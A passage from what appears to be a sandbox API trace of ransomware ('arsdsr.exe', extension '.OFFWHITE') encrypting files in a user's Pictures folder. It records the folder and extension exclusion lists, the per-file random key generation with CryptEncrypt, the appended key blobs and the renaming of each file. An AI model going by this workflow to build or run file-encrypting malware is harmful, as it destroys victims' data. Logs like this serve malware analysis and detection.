lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\*.*" [0135.336] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dd02120, ftCreationTime.dwHighDateTime=0x1d5d9ce, ftLastAccessTime.dwLowDateTime=0xe2a1f740, ftLastAccessTime.dwHighDateTime=0x1d5e4fa, ftLastWriteTime.dwLowDateTime=0xe2a1f740, ftLastWriteTime.dwHighDateTime=0x1d5e4fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName=".", cAlternateFileName="")) returned 0x544750 [0135.338] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.338] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7dd02120, ftCreationTime.dwHighDateTime=0x1d5d9ce, ftLastAccessTime.dwLowDateTime=0xe2a1f740, ftLastAccessTime.dwHighDateTime=0x1d5e4fa, ftLastWriteTime.dwLowDateTime=0xe2a1f740, ftLastWriteTime.dwHighDateTime=0x1d5e4fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="..", cAlternateFileName="")) returned 1 [0135.338] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.338] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.338] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x847eeaf0, ftCreationTime.dwHighDateTime=0x1d5d957, ftLastAccessTime.dwLowDateTime=0x988efa50, ftLastAccessTime.dwHighDateTime=0x1d5e355, ftLastWriteTime.dwLowDateTime=0x988efa50, ftLastWriteTime.dwHighDateTime=0x1d5e355, nFileSizeHigh=0x0, nFileSizeLow=0x9eea, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="3f2PQG.png", cAlternateFileName="")) returned 1 [0135.338] lstrcmpiW (lpString1="3f2PQG.png", lpString2=".") returned 1 [0135.338] lstrcmpiW (lpString1="3f2PQG.png", lpString2="..") returned 1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="...") returned 1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="windows") returned -1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="$recycle.bin") returned 1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="rsa") returned -1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="ntuser.dat") returned -1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="programdata") returned -1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="appdata") returned -1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="program files") returned -1 [0135.339] lstrcmpiW (lpString1="3f2PQG.png", lpString2="program files (x86)") returned -1 [0135.339] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.339] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="3f2PQG.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png" [0135.339] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.339] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.339] PathFindExtensionW (pszPath="3f2PQG.png") returned=".png" [0135.339] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.339] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.340] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.340] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.340] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.340] lstrcmpiW (lpString1="3f2PQG.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.340] GetProcessHeap () returned 0x500000 [0135.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5319e0 [0135.340] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\3f2pqg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.340] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=40682) returned 1 [0135.340] GetProcessHeap () returned 0x500000 [0135.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.340] GetProcessHeap () returned 0x500000 [0135.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.340] GetProcessHeap () returned 0x500000 [0135.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.340] GetProcessHeap () returned 0x500000 [0135.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.341] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.341] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.341] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.341] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.341] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9eea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.342] SetLastError (dwErrCode=0x0) [0135.342] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.344] GetLastError () returned 0x0 [0135.344] GetLastError () returned 0x0 [0135.344] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9fea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.344] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.344] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa0ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.344] WriteFile (in: hFile=0x218, lpBuffer=0x5319e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5319e0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.344] GetProcessHeap () returned 0x500000 [0135.344] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9eea) returned 0x55c7c8 [0135.344] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.344] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x9eea, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x9eea, lpOverlapped=0x0) returned 1 [0135.348] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.348] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x9eea, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x9eea, lpOverlapped=0x0) returned 1 [0135.348] GetProcessHeap () returned 0x500000 [0135.348] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.348] CloseHandle (hObject=0x218) returned 1 [0135.351] GetProcessHeap () returned 0x500000 [0135.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.351] GetProcessHeap () returned 0x500000 [0135.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.351] GetProcessHeap () returned 0x500000 [0135.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.351] GetProcessHeap () returned 0x500000 [0135.351] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.351] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png" [0135.351] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png.OFFWHITE" [0135.351] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\3f2pqg.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\3f2PQG.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\3f2pqg.png.offwhite")) returned 1 [0135.352] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2917b40, ftCreationTime.dwHighDateTime=0x1d5e7c7, ftLastAccessTime.dwLowDateTime=0x6c46e500, ftLastAccessTime.dwHighDateTime=0x1d5e45b, ftLastWriteTime.dwLowDateTime=0x6c46e500, ftLastWriteTime.dwHighDateTime=0x1d5e45b, nFileSizeHigh=0x0, nFileSizeLow=0x9db1, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="6gGPAORgGoA3.bmp", cAlternateFileName="6GGPAO~1.BMP")) returned 1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2=".") returned 1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="..") returned 1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="...") returned 1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="windows") returned -1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="$recycle.bin") returned 1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="rsa") returned -1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="ntuser.dat") returned -1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="programdata") returned -1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="appdata") returned -1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="program files") returned -1 [0135.352] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="program files (x86)") returned -1 [0135.352] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\" [0135.352] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\", lpString2="6gGPAORgGoA3.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp" [0135.352] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.353] PathFindExtensionW (pszPath="6gGPAORgGoA3.bmp") returned=".bmp" [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.353] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.353] lstrcmpiW (lpString1="6gGPAORgGoA3.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.353] GetProcessHeap () returned 0x500000 [0135.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5319f0 [0135.353] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\6ggpaorggoa3.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0135.354] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=40369) returned 1 [0135.354] GetProcessHeap () returned 0x500000 [0135.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.354] GetProcessHeap () returned 0x500000 [0135.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.354] GetProcessHeap () returned 0x500000 [0135.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.354] GetProcessHeap () returned 0x500000 [0135.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.354] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.354] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0135.355] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.355] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.355] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0135.355] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9db1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.355] SetLastError (dwErrCode=0x0) [0135.355] WriteFile (in: hFile=0x218, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.357] GetLastError () returned 0x0 [0135.357] GetLastError () returned 0x0 [0135.357] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9eb1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.357] WriteFile (in: hFile=0x218, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0135.357] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9fb1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.357] WriteFile (in: hFile=0x218, lpBuffer=0x5319f0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5319f0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0135.357] GetProcessHeap () returned 0x500000 [0135.358] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9db1) returned 0x55c7c8 [0135.358] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.358] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0x9db1, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0x9db1, lpOverlapped=0x0) returned 1 [0135.361] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.361] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0x9db1, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0x9db1, lpOverlapped=0x0) returned 1 [0135.361] GetProcessHeap () returned 0x500000 [0135.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0135.361] CloseHandle (hObject=0x218) returned 1 [0135.363] GetProcessHeap () returned 0x500000 [0135.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.363] GetProcessHeap () returned 0x500000 [0135.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.363] GetProcessHeap () returned 0x500000 [0135.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.363] GetProcessHeap () returned 0x500000 [0135.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.363] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp" [0135.363] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp.OFFWHITE" [0135.363] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\6ggpaorggoa3.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\OJSDcgvJ7QYZh\\6gGPAORgGoA3.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ojsdcgvj7qyzh\\6ggpaorggoa3.bmp.offwhite")) returned 1 [0135.364] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae36cec0, ftCreationTime.dwHighDateTime=0x1d5d86d, ftLastAccessTime.dwLowDateTime=0xbc5cd7d0, ftLastAccessTime.dwHighDateTime=0x1d5e53b, ftLastWriteTime.dwLowDateTime=0xbc5cd7d0, ftLastWriteTime.dwHighDateTime=0x1d5e53b, nFileSizeHigh=0x0, nFileSizeLow=0x15c64, dwReserved0=0x295d1bc, dwReserved1=0x11bbedd5, cFileName="cLZ7.png", cAlternateFileName="")) returned 1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2=".") returned 1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="..") returned 1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="...") returned 1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="windows") returned -1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="$recycle.bin") returned 1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="rsa") returned -1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="ntuser.dat") returned -1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="programdata") returned -1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="appdata") returned 1 [0135.364] lstrcmpiW (lpString1="cLZ7.png", lpString2="program files") returned -1 [0135.364] 